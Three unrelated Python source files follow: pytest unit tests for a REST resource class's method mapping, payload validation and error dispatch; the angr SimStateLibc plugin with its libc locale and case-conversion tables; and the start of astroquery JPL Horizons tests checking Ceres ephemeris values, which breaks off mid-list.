resource, _, _ = create_resource_helper(method='PUT')
assert 'edit' == resource._get_method_name(has_iden=True)
def test_get_method_name_edit_without_iden():
resource, _, _ = create_resource_helper(method='PUT')
with pytest.raises(errors.BadRequestError) as e:
resource._get_method_name(has_iden=False)
assert 'Given method requires iden' in str(e)
def test_get_method_name_create():
resource, _, _ = create_resource_helper(method='POST')
assert 'create' == resource._get_method_name(has_iden=False)
def test_get_method_name_create_with_id():
resource, _, _ = create_resource_helper(method='POST')
with pytest.raises(errors.BadRequestError) as e:
resource._get_method_name(has_iden=True)
assert "Given method shouldn't have iden" in str(e)
def test_get_method_name_delete():
resource, _, _ = create_resource_helper(method='DELETE')
assert 'delete' == resource._get_method_name(has_iden=True)
def test_get_method_name_unpecefied_method():
resource, _, _ = create_resource_helper(method='HEAD')
with pytest.raises(errors.MethodNotAllowedError) as e:
resource._get_method_name(has_iden=True)
assert 'Method "HEAD" is not supported' in str(e)
def test_get_method_name_method_override():
headers = {'HTTP_X_HTTP_METHOD_OVERRIDE': 'PUT'}
resource, _, _ = create_resource_helper(method='HEAD', headers=headers)
assert 'edit' == resource._get_method_name(has_iden=True)
def test_iden_required_positive():
resource, _, _ = create_resource_helper()
assert resource._iden_required('show')
assert resource._iden_required('edit')
assert resource._iden_required('delete')
def test_iden_required_negative():
resource, _, _ = create_resource_helper()
assert resource._iden_required('create') is False
assert resource._iden_required('list') is False
def test_match_response_to_fields():
resource, _, _ = create_resource_helper()
resource.fields = mock.Mock(spec=fields.FieldSet)
resource.fields.field_names = ['name1', 'name2', 'name3']
data = {'name1': 1, 'name2': 2, 'name3': 3, 'name4': 4}
expected_data = {'name1': 1, 'name2': 2, 'name3': 3}
assert resource._match_response_to_fields(data) == expected_data
def test_match_response_list_to_fields():
resource, _, _ = create_resource_helper()
resource.fields = mock.Mock(spec=fields.FieldSet)
resource.fields.field_names = ['name1', 'name2', 'name3']
lst = [
{'name1': 1, 'name2': 2, 'name3': 3, 'name4': 4},
{'name1': 5, 'name2': 6},
]
expected_lst = [
{'name1': 1, 'name2': 2, 'name3': 3},
{'name1': 5, 'name2': 6},
]
assert list(resource._match_resource_list_to_fields(lst)) == expected_lst
def test_apply_decorators():
resource, _, _ = create_resource_helper()
resource.create = mock.MagicMock(return_value={
'test1': 0,
'test2': 0,
})
order = []
def dummy_decorator1(func):
def wrapper(*a, **kw):
order.append('dummy_decorator1')
res = func(*a, **kw)
res['test1'] = 'replacement #1'
return res
return wrapper
def dummy_decorator2(func):
def wrapper(*a, **kw):
order.append('dummy_decorator2')
res = func(*a, **kw)
res['test2'] = 'replacement #2'
return res
return wrapper
resource.decorators = [dummy_decorator1, dummy_decorator2]
resource.create = resource._apply_decorators(resource.create)
expected_values = {'test1': 'replacement #1', 'test2': 'replacement #2'}
assert resource.create() == expected_values
assert order == ['dummy_decorator1', 'dummy_decorator2']
def test_is_valid_formatter_positive():
resource, _, _ = create_resource_helper(formatter=formats.JsonFormat)
assert resource._is_valid_formatter
def test_is_valid_formatter_negative():
resource, _, _ = create_resource_helper(formatter=None)
assert resource._is_valid_formatter is False
def test_error_formatter_valid():
resource, _, _ = create_resource_helper(formatter=formats.JsonFormat)
assert resource._error_formatter == formats.JsonFormat
def test_error_formatter_with_unknown_formatter():
resource, _, _ = create_resource_helper(formatter=None)
assert resource._error_formatter == formats.DEFAULT_FORMATTER
def test_get_method_valid():
resource, _, _ = create_resource_helper()
type(resource).create = mock.Mock(return_value={})
assert resource._get_method('create') == resource.create
def test_get_method_with_not_existing_method():
resource, _, _ = create_resource_helper()
with pytest.raises(errors.BadRequestError) as e:
resource._get_method('not_exising_method')
assert 'Method "GET" is not implemented for a given endpoint' in str(e)
def test_get_payload_should_pass_validation():
resource, _, formatter_mock = create_resource_helper(
method='PUT', data='data'
)
formatter_mock.unserialize.return_value = {'data': 'should be overriden'}
expected_data = {'data': 'new value'}
resource.fields = mock.Mock()
resource.fields.validate.return_value = expected_data
assert resource._get_payload('edit') == expected_data
def test_get_payload_unexpected_data():
resource, _, formatter_mock = create_resource_helper(
method='PUT', data='data'
)
formatter_mock.unserialize.side_effect = formats.LoadError()
with pytest.raises(errors.BadRequestError) as e:
resource._get_payload('edit')
assert 'Fail to load the data' in str(e)
def test_get_payload_not_mapable_payload():
resource, _, formatter_mock = create_resource_helper(
method='PUT', data='data'
)
formatter_mock.unserialize.return_value = ['item']
with pytest.raises(errors.BadRequestError) as e:
resource._get_payload('edit')
assert 'Data should be key -> value structure' in str(e)
def test_get_payload_field_validation_fails():
resource, _, formatter_mock = create_resource_helper(
method='PUT', data='data'
)
formatter_mock.unserialize.return_value = {'test': 'data'}
resource.fields = mock.Mock()
field_error_message = 'Invalid field value'
resource.fields.validate.side_effect = fields.FieldSet.Error(
field_error_message
)
with pytest.raises(errors.BadRequestError) as e:
resource._get_payload('edit')
assert field_error_message in str(e)
def test_get_payload_field_misconfigured_fields_fails():
resource, _, formatter_mock = create_resource_helper(
method='PUT', data='data'
)
formatter_mock.unserialize.return_value = {'test': 'data'}
resource.fields = mock.Mock()
configuration_error_message = 'Improperly configured'
conf_error = fields.FieldSet.ConfigurationError(
configuration_error_message
)
resource.fields.validate.side_effect = conf_error
with pytest.raises(errors.ServerError) as e:
resource._get_payload('edit')
assert configuration_error_message in str(e)
def test_get_payload_field_validation_no_data_empty_payload():
resource, _, _ = create_resource_helper(method='POST')
assert {} == resource._get_payload('create')
def test_get_payload_validation_no_fields_case_empty_payload():
resource, _, formatter_mock = create_resource_helper(
method='PUT', data='data'
)
formatter_mock.unserialize.return_value = {'data': 'test'}
assert {} == resource._get_payload('edit')
@patch.object(formats.JsonFormat, 'serialize')
def test_process_valid(serialize_mock):
mocked_value = 'mocked_value'
serialize_mock.return_value = mocked_value
resource, _, _ = create_resource_helper(formatter=formats.JsonFormat)
type(resource).show = mock.Mock(return_value={})
res = resource.process(iden=10)
assert res == mocked_value
@patch.object(formats.JsonFormat, 'serialize')
def test_process_valid_list(serialize_mock):
resource, _, _ = create_resource_helper(formatter=formats.JsonFormat)
serialize_mock.return_value = '[]'
type(resource).list = mock.Mock(return_value=[])
res = resource.process()
assert res == '[]'
serialize_mock.return_value = '{}'
resource.show = mock.Mock(return_value={})
res = resource.process(iden=10)
assert res == '{}'
def test_process_wrong_formatter():
resource, _, _ = create_resource_helper(formatter=None)
resource.list = mock.MagicMock(return_value='')
with pytest.raises(errors.BadRequestError) as e:
resource.process()
assert 'Not recognizable format' in str(e)
@patch.object(formats.JsonFormat, 'serialize')
def test_process_method_raising_rest_error(serialize_mock):
resource, _, _ = create_resource_helper(formatter=formats.JsonFormat)
type(resource).list = mock.Mock(side_effect=errors.RestError('test'))
with pytest.raises(errors.RestError) as e:
resource.process()
assert 'test' in str(e)
@patch.object(formats.JsonFormat, 'serialize')
def test_process_error_in_method_should_raise_server_error(serialize_mock):
resource, _, _ = create_resource_helper(formatter=formats.JsonFormat)
type(resource).list = mock.MagicMock(
side_effect=ValueError('I will raise')
)
with pytest.raises(ValueError) as e:
resource.process()
assert 'I will raise' in str(e)
@patch.object(formats.JsonFormat, 'serialize')
def test_process_error_in_formatter_serialize_should_raise_server_error(
serialize_mock
):
resource, _, _ = create_resource_helper(formatter=formats.JsonFormat)
type(resource).list = mock.MagicMock(return_value='')
serialize_mock.side_effect = formats.LoadError()
with pytest.raises(errors.ServerError) as e:
resource.process()
assert "Service can't respond with this format" in str(e)
@patch.object(Resource, 'process')
def test_dispatch_valid(process_mock):
args = ('arg1', 'arg2')
kwargs = {'kw1': 'kw1', 'kw2': 'kw2'}
expected_result = json.dumps({'res': 'response from process'})
expected_content_type = 'content/type'
formatter_mock = mock.Mock(content_type=expected_content_type)
resource, _, _ = create_resource_helper(formatter=formatter_mock)
process_mock.return_value = expected_result
res, status, content_type, headers = resource.dispatch(*args, **kwargs)
resource.process.assert_called_with(*args, **kwargs)
assert res == expected_result
assert status == 200
assert content_type == expected_content_type
assert headers == {}
@patch.object(Resource, 'process')
def test_dispatch_exception(process_mock):
resource, _, _ = create_resource_helper()
resource.process.side_effect = errors.ServerError('Error!')
res, status, content_type, headers = resource.dispatch()
assert res == json.dumps({'error': 'Error!'})
assert status == 503
assert content_type == 'application/json'
assert headers == {}
resource.process.side_effect = errors.BadRequestError('Wrong!', code=101)
res, status, content_type, headers = resource.dispatch()
expected_response = {'error': 'Wrong!', 'code': 101}
assert set(json.loads(res).items()) == set(expected_response.items())
assert status == 400
assert content_type == 'application/json'
assert headers == {}
resource.process.side_effect = errors.ForbiddenError(
'Unauthorized!', login_path='/login'
)
res, status, content_type, headers = resource.dispatch()
expected_response = {'error': 'Unauthorized!', 'login_path': '/login'}
assert set(json.loads(res).items()) == set(expected_response.items())
assert status == 403
assert content_type == 'application/json'
assert headers == {}
resource.process.side_effect = errors.NotFoundError(
'Not found!', code=101, redirect_path='/search'
)
res, status, content_type, headers = resource.dispatch()
expected_response = {
'error': 'Not found!', 'code': 101, 'redirect_path': '/search'
}
assert set(json.loads(res).items()) == set(expected_response.items())
assert status == 404
assert content_type == 'application/json'
assert headers == {}
@patch.object(Resource, 'process')
def test_headers_with_sucess_response(process_mock):
expected_result = json.dumps({'res': 'response from process'})
expected_content_type = 'content/type'
formatter_mock = mock.Mock(content_type=expected_content_type)
resource, _, _ = create_resource_helper(formatter=formatter_mock)
process_mock.return_value = expected_result
resource.set_header('foo', 'bar')
resource.clear_header('baz')
res, status, content_type, headers = resource.dispatch()
resource.process.assert_called_with()
assert res == expected_result
assert status == 200
assert content_type == expected_content_type
assert headers == collections.OrderedDict([('foo', 'bar')])
@patch.object(Resource, 'process')
def test_headers_with_failed_response(process_mock):
resource, _, _ = create_resource_helper()
resource.process.side_effect = errors.ServerError('Error!')
resource.set_header('foo', 'bar')
resource.clear_header('baz')
res, status, content_type, headers = resource.dispatch()
assert res == json.dumps({'error': 'Error!'})
assert status == 503
assert content_type == 'application/json'
assert headers == collections.OrderedDict([('foo', 'bar')])
| |
from .plugin import SimStatePlugin
class SimStateLibc(SimStatePlugin):
"""
This state plugin keeps track of various libc stuff:
"""
#__slots__ = [ 'heap_location', 'max_str_symbolic_bytes' ]
LOCALE_ARRAY = [
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x80
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x86
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x8c
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x92
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x98
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x9e
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xa4
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xaa
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xb0
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xb6
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xbc
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xc2
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xc8
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xce
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xd4
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xda
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xe0
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xe6
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xec
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xf2
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xf8
b"\000\000", b"\000\000", b"\002\000", b"\002\000", b"\002\000", b"\002\000", # 0xfe
b"\002\000", b"\002\000", b"\002\000", b"\002\000", b"\002\000", b"\003\040", # 0x04
b"\002\040", b"\002\040", b"\002\040", b"\002\040", b"\002\000", b"\002\000", # 0x0a
b"\002\000", b"\002\000", b"\002\000", b"\002\000", b"\002\000", b"\002\000", # 0x10
b"\002\000", b"\002\000", b"\002\000", b"\002\000", b"\002\000", b"\002\000", # 0x16
b"\002\000", b"\002\000", b"\002\000", b"\002\000", b"\001\140", b"\004\300", # 0x1c
b"\004\300", b"\004\300", b"\004\300", b"\004\300", b"\004\300", b"\004\300", # 0x22
b"\004\300", b"\004\300", b"\004\300", b"\004\300", b"\004\300", b"\004\300", # 0x28
b"\004\300", b"\004\300", b"\010\330", b"\010\330", b"\010\330", b"\010\330", # 0x2e
b"\010\330", b"\010\330", b"\010\330", b"\010\330", b"\010\330", b"\010\330", # 0x34
b"\004\300", b"\004\300", b"\004\300", b"\004\300", b"\004\300", b"\004\300", # 0x3a
b"\004\300", b"\010\325", b"\010\325", b"\010\325", b"\010\325", b"\010\325", # 0x40
b"\010\325", b"\010\305", b"\010\305", b"\010\305", b"\010\305", b"\010\305", # 0x46
b"\010\305", b"\010\305", b"\010\305", b"\010\305", b"\010\305", b"\010\305", # 0x4c
b"\010\305", b"\010\305", b"\010\305", b"\010\305", b"\010\305", b"\010\305", # 0x52
b"\010\305", b"\010\305", b"\010\305", b"\004\300", b"\004\300", b"\004\300", # 0x58
b"\004\300", b"\004\300", b"\004\300", b"\010\326", b"\010\326", b"\010\326", # 0x5e
b"\010\326", b"\010\326", b"\010\326", b"\010\306", b"\010\306", b"\010\306", # 0x64
b"\010\306", b"\010\306", b"\010\306", b"\010\306", b"\010\306", b"\010\306", # 0x6a
b"\010\306", b"\010\306", b"\010\306", b"\010\306", b"\010\306", b"\010\306", # 0x70
b"\010\306", b"\010\306", b"\010\306", b"\010\306", b"\010\306", b"\004\300", # 0x76
b"\004\300", b"\004\300", b"\004\300", b"\002\000", b"\000\000", b"\000\000", # 0x7c
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x82
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x88
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x8e
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x94
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x9a
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xa0
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xa6
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xac
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xb2
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xb8
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xbe
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xc4
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xca
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xd0
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xd6
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xdc
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xe2
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xe8
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xee
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xf4
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xfa
]
TOLOWER_LOC_ARRAY = [
0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, # 0x80
0x88, 0x89, 0x8a, 0x8b, 0x8c, 0x8d, 0x8e, 0x8f, # 0x88
0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, # 0x90
0x98, 0x99, 0x9a, 0x9b, 0x9c, 0x9d, 0x9e, 0x9f, # 0x98
0xa0, 0xa1, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6, 0xa7, # 0xa0
0xa8, 0xa9, 0xaa, 0xab, 0xac, 0xad, 0xae, 0xaf, # 0xa8
0xb0, 0xb1, 0xb2, 0xb3, 0xb4, 0xb5, 0xb6, 0xb7, # 0xb0
0xb8, 0xb9, 0xba, 0xbb, 0xbc, 0xbd, 0xbe, 0xbf, # 0xb8
0xc0, 0xc1, 0xc2, 0xc3, 0xc4, 0xc5, 0xc6, 0xc7, # 0xc0
0xc8, 0xc9, 0xca, 0xcb, 0xcc, 0xcd, 0xce, 0xcf, # 0xc8
0xd0, 0xd1, 0xd2, 0xd3, 0xd4, 0xd5, 0xd6, 0xd7, # 0xd0
0xd8, 0xd9, 0xda, 0xdb, 0xdc, 0xdd, 0xde, 0xdf, # 0xd8
0xe0, 0xe1, 0xe2, 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, # 0xe0
0xe8, 0xe9, 0xea, 0xeb, 0xec, 0xed, 0xee, 0xef, # 0xe8
0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, # 0xf0
0xf8, 0xf9, 0xfa, 0xfb, 0xfc, 0xfd, 0xfe, 0xffffffff, # 0xf8
0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, # 0x00
0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, # 0x08
0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, # 0x10
0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, # 0x18
0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, # 0x20
0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, # 0x28
0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, # 0x30
0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, # 0x38
0x40, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, # 0x40
0x68, 0x69, 0x6a, 0x6b, 0x6c, 0x6d, 0x6e, 0x6f, # 0x48
0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, # 0x50
0x78, 0x79, 0x7a, 0x5b, 0x5c, 0x5d, 0x5e, 0x5f, # 0x58
0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, # 0x60
0x68, 0x69, 0x6a, 0x6b, 0x6c, 0x6d, 0x6e, 0x6f, # 0x68
0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, # 0x70
0x78, 0x79, 0x7a, 0x7b, 0x7c, 0x7d, 0x7e, 0x7f, # 0x78
0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, # 0x80
0x88, 0x89, 0x8a, 0x8b, 0x8c, 0x8d, 0x8e, 0x8f, # 0x88
0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, # 0x90
0x98, 0x99, 0x9a, 0x9b, 0x9c, 0x9d, 0x9e, 0x9f, # 0x98
0xa0, 0xa1, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6, 0xa7, # 0xa0
0xa8, 0xa9, 0xaa, 0xab, 0xac, 0xad, 0xae, 0xaf, # 0xa8
0xb0, 0xb1, 0xb2, 0xb3, 0xb4, 0xb5, 0xb6, 0xb7, # 0xb0
0xb8, 0xb9, 0xba, 0xbb, 0xbc, 0xbd, 0xbe, 0xbf, # 0xb8
0xc0, 0xc1, 0xc2, 0xc3, 0xc4, 0xc5, 0xc6, 0xc7, # 0xc0
0xc8, 0xc9, 0xca, 0xcb, 0xcc, 0xcd, 0xce, 0xcf, # 0xc8
0xd0, 0xd1, 0xd2, 0xd3, 0xd4, 0xd5, 0xd6, 0xd7, # 0xd0
0xd8, 0xd9, 0xda, 0xdb, 0xdc, 0xdd, 0xde, 0xdf, # 0xd8
0xe0, 0xe1, 0xe2, 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, # 0xe0
0xe8, 0xe9, 0xea, 0xeb, 0xec, 0xed, 0xee, 0xef, # 0xe8
0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, # 0xf0
0xf8, 0xf9, 0xfa, 0xfb, 0xfc, 0xfd, 0xfe, 0xff, # 0xf8
]
TOUPPER_LOC_ARRAY =[
0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, # 0x80
0x88, 0x89, 0x8a, 0x8b, 0x8c, 0x8d, 0x8e, 0x8f, # 0x88
0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, # 0x90
0x98, 0x99, 0x9a, 0x9b, 0x9c, 0x9d, 0x9e, 0x9f, # 0x98
0xa0, 0xa1, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6, 0xa7, # 0xa0
0xa8, 0xa9, 0xaa, 0xab, 0xac, 0xad, 0xae, 0xaf, # 0xa8
0xb0, 0xb1, 0xb2, 0xb3, 0xb4, 0xb5, 0xb6, 0xb7, # 0xb0
0xb8, 0xb9, 0xba, 0xbb, 0xbc, 0xbd, 0xbe, 0xbf, # 0xb8
0xc0, 0xc1, 0xc2, 0xc3, 0xc4, 0xc5, 0xc6, 0xc7, # 0xc0
0xc8, 0xc9, 0xca, 0xcb, 0xcc, 0xcd, 0xce, 0xcf, # 0xc8
0xd0, 0xd1, 0xd2, 0xd3, 0xd4, 0xd5, 0xd6, 0xd7, # 0xd0
0xd8, 0xd9, 0xda, 0xdb, 0xdc, 0xdd, 0xde, 0xdf, # 0xd8
0xe0, 0xe1, 0xe2, 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, # 0xe0
0xe8, 0xe9, 0xea, 0xeb, 0xec, 0xed, 0xee, 0xef, # 0xe8
0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, # 0xf0
0xf8, 0xf9, 0xfa, 0xfb, 0xfc, 0xfd, 0xfe, 0xffffffff, # 0xf8
0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, # 0x00
0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, # 0x08
0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, # 0x10
0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, # 0x18
0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, # 0x20
0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, # 0x28
0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, # 0x30
0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, # 0x38
0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, # 0x40
0x48, 0x49, 0x4a, 0x4b, 0x4c, 0x4d, 0x4e, 0x4f, # 0x48
0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, # 0x50
0x58, 0x59, 0x5a, 0x5b, 0x5c, 0x5d, 0x5e, 0x5f, # 0x58
0x60, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, # 0x60
0x48, 0x49, 0x4a, 0x4b, 0x4c, 0x4d, 0x4e, 0x4f, # 0x68
0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, # 0x70
0x58, 0x59, 0x5a, 0x7b, 0x7c, 0x7d, 0x7e, 0x7f, # 0x78
0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, # 0x80
0x88, 0x89, 0x8a, 0x8b, 0x8c, 0x8d, 0x8e, 0x8f, # 0x88
0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, # 0x90
0x98, 0x99, 0x9a, 0x9b, 0x9c, 0x9d, 0x9e, 0x9f, # 0x98
0xa0, 0xa1, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6, 0xa7, # 0xa0
0xa8, 0xa9, 0xaa, 0xab, 0xac, 0xad, 0xae, 0xaf, # 0xa8
0xb0, 0xb1, 0xb2, 0xb3, 0xb4, 0xb5, 0xb6, 0xb7, # 0xb0
0xb8, 0xb9, 0xba, 0xbb, 0xbc, 0xbd, 0xbe, 0xbf, # 0xb8
0xc0, 0xc1, 0xc2, 0xc3, 0xc4, 0xc5, 0xc6, 0xc7, # 0xc0
0xc8, 0xc9, 0xca, 0xcb, 0xcc, 0xcd, 0xce, 0xcf, # 0xc8
0xd0, 0xd1, 0xd2, 0xd3, 0xd4, 0xd5, 0xd6, 0xd7, # 0xd0
0xd8, 0xd9, 0xda, 0xdb, 0xdc, 0xdd, 0xde, 0xdf, # 0xd8
0xe0, 0xe1, 0xe2, 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, # 0xe0
0xe8, 0xe9, 0xea, 0xeb, 0xec, 0xed, 0xee, 0xef, # 0xe8
0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, # 0xf0
0xf8, 0xf9, 0xfa, 0xfb, 0xfc, 0xfd, 0xfe, 0xff, # 0xf8
]
def __init__(self):
SimStatePlugin.__init__(self)
# various thresholds
self.buf_symbolic_bytes = 60
self.max_symbolic_strstr = 1
self.max_symbolic_strchr = 16
self.max_variable_size = 128
self.max_str_len = 128
self.max_buffer_size = 48
self.max_strtol_len = 11 # len(str(2**31)) + 1
self.max_memcpy_size = 4096
self.max_packet_size = 256
# strtok
self.strtok_heap = [ ]
self.simple_strtok = True
self.strtok_token_size = 1024
# helpful stuff
self.strdup_stack = [ ]
# as per Audrey:
# the idea is that there's two abi versions, and for one of them, the
# address passed to libc_start_main isn't actually the address of the
# function, but the address of a pointer to a struct containing the
# actual function address and the table of contents address
self.ppc64_abiv = None
# It will be initialized in __libc_start_main SimProcedure
self.ctype_b_loc_table_ptr = None
self.ctype_tolower_loc_table_ptr = None
self.ctype_toupper_loc_table_ptr = None
self.errno_location = None
@SimStatePlugin.memo
def copy(self, memo): # pylint: disable=unused-argument
c = SimStateLibc()
c.buf_symbolic_bytes = self.buf_symbolic_bytes
c.max_symbolic_strstr = self.max_symbolic_strstr
c.max_symbolic_strchr = self.max_symbolic_strchr
c.max_variable_size = self.max_variable_size
c.max_str_len = self.max_str_len
c.max_buffer_size = self.max_buffer_size
c.max_strtol_len = self.max_strtol_len
c.max_memcpy_size = self.max_memcpy_size
c.max_packet_size = self.max_packet_size
c.strtok_heap = self.strtok_heap[:]
c.simple_strtok = self.simple_strtok
c.strtok_token_size = self.strtok_token_size
c.strdup_stack = self.strdup_stack[:]
c.ppc64_abiv = self.ppc64_abiv
c.ctype_b_loc_table_ptr = self.ctype_b_loc_table_ptr
c.ctype_tolower_loc_table_ptr = self.ctype_tolower_loc_table_ptr
c.ctype_toupper_loc_table_ptr = self.ctype_toupper_loc_table_ptr
c.errno_location = self.errno_location
#c.aa = self.aa
return c
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
return False
def widen(self, others):
return False
@property
def errno(self):
return self.state.mem[self.errno_location].int.resolved
@errno.setter
def errno(self, val):
self.state.mem[self.errno_location].int = val
def ret_errno(self, val):
try:
ival = getattr(self.state.posix, val)
except AttributeError as e:
raise ValueError("Invalid errno constant %s" % val) from e
if self.state.scratch.sim_procedure.is_syscall:
return -ival
else:
self.errno = ival
return -1
from angr.sim_state import SimState
SimState.register_default('libc', SimStateLibc)
| |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import pytest
from astropy.tests.helper import assert_quantity_allclose
from numpy.ma import is_masked
from ... import jplhorizons
@pytest.mark.remote_data
class TestHorizonsClass:
def test_ephemerides_query(self):
# check values of Ceres for a given epoch
# orbital uncertainty of Ceres is basically zero
res = jplhorizons.Horizons(id='Ceres', location='500',
id_type='smallbody',
epochs=2451544.5).ephemerides()[0]
assert res['targetname'] == "1 Ceres (A801 AA)"
assert res['datetime_str'] == "2000-Jan-01 00:00:00.000"
assert res['solar_presence'] == ""
assert res['flags'] == ""
assert res['elongFlag'] == '/L'
assert res['airmass'] == 999
assert is_masked(res['AZ'])
assert is_masked(res['EL'])
assert is_masked(res['magextinct'])
assert_quantity_allclose(
[2451544.5,
188.70280, 9.09829, 34.40955, -2.68359,
8.469, 7.009, 96.17083,
161.3828, 10.4528, 2.551099014238, 0.1744491,
2.26315116146176, -21.9390511, 18.822054,
95.3996, 22.5698, 292.551, 296.850,
184.3426220, 11.7996521, 289.864329, 71.545655,
0, 0],
[res['datetime_jd'],
res['RA'], res['DEC'], res['RA_rate'], res['DEC_rate'],
res['V'], res['surfbright'], res['illumination'],
res['EclLon'], res['EclLat'], res['r'], res['r_rate'],
res['delta'], res['delta_rate'], res['lighttime'],
res['elong'], res['alpha'], res['sunTargetPA'],
res['velocityPA'],
